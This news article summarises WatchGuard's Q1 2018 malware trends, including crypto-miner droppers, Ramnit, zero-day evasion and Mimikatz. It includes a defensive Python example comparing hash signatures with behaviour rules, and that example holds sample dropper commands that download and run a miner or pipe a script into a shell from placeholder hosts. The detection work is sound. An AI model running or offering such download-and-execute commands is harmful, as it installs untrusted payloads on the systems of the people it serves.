Crypto-Mining For Cyber Criminals

WatchGuard threat intelligence from Q1 2018 revealed that 98.8 percent of seemingly common Linux/Downloader malware variants were actually designed to deliver a popular Linux-based crypto-currency miner. 

This is just one of several signs that malicious crypto-mining malware is becoming a top tactic among cyber criminals.

“Our Threat Lab team has uncovered multiple indicators that suggest malicious crypto miners are becoming a mainstay in cyber criminals’ arsenals, and will continue to grow more dominant in Q2,” said Corey Nachreiner, CTO at WatchGuard Technologies. 

“While ransomware and other advanced threats are still a major concern, these new crypto-miner attacks illustrate that bad actors are constantly adjusting their tactics to find new ways to take advantage of their victims.

“In fact, once again in Q1, we saw nearly half of all malware slip past basic signature-based antivirus solutions due to various obfuscation methods.

“One way every organisation can become more secure against these sophisticated, evasive threats is to deploy defenses enabled with advanced malware prevention.”

Crypto-currency miners are on the rise
Several crypto-currency miners appeared for the first time in WatchGuard’s list of the top 25 malware variants. Firebox appliances have a rule called Linux/Downloader, which catches a variety of Linux “dropper” or “downloader” programs that download and run malware payloads. 

Usually these droppers download a wide range of malware, but in Q1 2018, 98.8 percent of Linux/Downloader instances were trying to download the same popular Linux-based crypto miner. Evidence from Q2 so far indicates that crypto-mining malware will stay on WatchGuard’s top 25 list and may even crack the top 10 by the end of the quarter.

The Ramnit Trojan makes a comeback in Italy
The only malware sample on WatchGuard’s top 10 list that hadn’t appeared in a past report was Ramnit, a Trojan that first emerged in 2010 and had a brief resurgence in 2016. Nearly all (98.9 percent) of WatchGuard’s Ramnit detections came from Italy, indicating a targeted attack campaign. 

Since past versions of Ramnit have targeted banking credentials, WatchGuard advises Italians to take extra precautions with their banking information and enable multi-factor authentication for any financial accounts.

For the first time, APAC reports the highest Malware volume
In past reports, APAC has trailed EMEA and AMER in the number of reported malware hits by a wide margin. In Q1 2018, APAC received the most malware overall. The vast majority of these attacks were Windows-based malware and 98 percent were aimed at India and Singapore.

Nearly half of all malware eludes basic AV solutions
Zero-day malware (a term for malware that is able to evade traditional signature-based AV) accounted for 46 percent of all malware in Q1. This level of zero-day malware suggests that criminals are continuing to use obfuscation techniques to beat traditional AV services, emphasising the importance of behavior-based defenses.
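The Linux/Downloader rule described above and the point about zero-day malware slipping past signature-based AV can be illustrated side by side. The following is an added example, not WatchGuard's code or rule logic: a hash-based "signature" that recognises exactly one constructed dropper script is compared with behaviour rules that look for what a downloader does (fetch a file, make it executable and run it from a temporary directory, or pipe a download straight into a shell). The sample scripts, the hostnames EXAMPLE-HOST and EXAMPLE-POOL, and the use of a stratum+tcp pool URI as a miner indicator are constructed or assumed for the illustration.

```python
import hashlib
import re

# Constructed sample "dropper" scripts (not real malware). V2 is V1 with a
# comment and different separators/spacing: trivially different bytes, same behaviour.
DROPPER_V1 = (
    "wget -q http://EXAMPLE-HOST/miner -O /tmp/.x && chmod +x /tmp/.x "
    "&& /tmp/.x -o stratum+tcp://EXAMPLE-POOL:3333\n"
)
DROPPER_V2 = (
    "# updated build\n"
    "wget -q http://EXAMPLE-HOST/miner -O /tmp/.x ; chmod  +x /tmp/.x ; "
    "/tmp/.x -o stratum+tcp://EXAMPLE-POOL:3333\n"
)
PIPE_DROPPER = "curl -s http://EXAMPLE-HOST/i.sh | sh\n"
BENIGN = "wget -q https://EXAMPLE-HOST/report.pdf -O /home/user/report.pdf\n"

# A traditional signature: the SHA-256 of the one sample the vendor has seen.
KNOWN_BAD_SHA256 = {hashlib.sha256(DROPPER_V1.encode()).hexdigest()}


def signature_match(script: str) -> bool:
    """Hash-based detection: only byte-identical samples are caught."""
    return hashlib.sha256(script.encode()).hexdigest() in KNOWN_BAD_SHA256


# Behaviour rules describe what a downloader does, not what it looks like byte for byte.
DOWNLOADER = re.compile(r"\b(wget|curl)\b")
MAKE_EXEC = re.compile(r"\bchmod\s+\+x\b")
TMP_PATH = re.compile(r"(^|[\s;&|])/(tmp|dev/shm|var/tmp)/\S+")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")
MINER_POOL = re.compile(r"\bstratum\+tcp://")  # assumed indicator of a mining-pool connection


def behaviour_findings(script: str) -> list[str]:
    """Return the names of the behaviour rules a script triggers, in a fixed order."""
    # Comments carry no behaviour, so they are dropped before matching.
    text = " ".join(
        line for line in script.splitlines() if not line.lstrip().startswith("#")
    )
    findings = []
    if DOWNLOADER.search(text) and PIPE_TO_SHELL.search(text):
        findings.append("download-piped-to-shell")
    if DOWNLOADER.search(text) and MAKE_EXEC.search(text) and TMP_PATH.search(text):
        findings.append("download-chmod-tmp-path")
    if MINER_POOL.search(text):
        findings.append("mining-pool-uri")
    return findings


def classify(script: str) -> dict:
    """Combine both approaches so the gap between them is visible per sample."""
    findings = behaviour_findings(script)
    return {
        "signature_hit": signature_match(script),
        "behaviour_hit": bool(findings),
        "findings": findings,
    }


if __name__ == "__main__":
    for name, sample in [("V1", DROPPER_V1), ("V2", DROPPER_V2),
                         ("pipe", PIPE_DROPPER), ("benign", BENIGN)]:
        print(name, classify(sample))
```

Running the block shows the asymmetry the report describes: the signature catches only V1, while the behaviour rules flag V1, V2 and the pipe-to-shell sample and stay quiet on the benign download. In a real deployment these rules would run on process-execution telemetry rather than on script text, and they are heuristics that need tuning against legitimate provisioning scripts that also fetch and run binaries.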

Mimikatz targets the US, skips Asia Pacific
The Mimikatz Windows credential-stealing malware reappeared on WatchGuard’s top 10 malware list after several quarters of absence. Two thirds of the detections of this malware were in the United States and under 0.1 percent of detections were in APAC, possibly due to the complexity of double-byte characters in countries like Japan that use a symbol-based language for passwords.

HelpNetSecurity
